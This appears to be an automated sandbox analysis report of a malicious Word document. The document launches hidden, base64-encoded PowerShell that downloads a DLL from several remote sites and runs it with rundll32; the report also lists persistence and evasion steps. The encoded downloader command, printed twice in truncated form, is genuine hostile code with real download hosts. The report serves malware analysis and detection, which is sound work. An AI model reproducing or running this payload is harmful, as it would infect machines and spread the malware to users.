JwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAEE117C22 push ds; ret 4_2_00007FFAEE117C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100037FB push ecx; ret 13_2_1000380E

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Ebern\dqxd.zpy Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ebern\dqxd.zpy:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
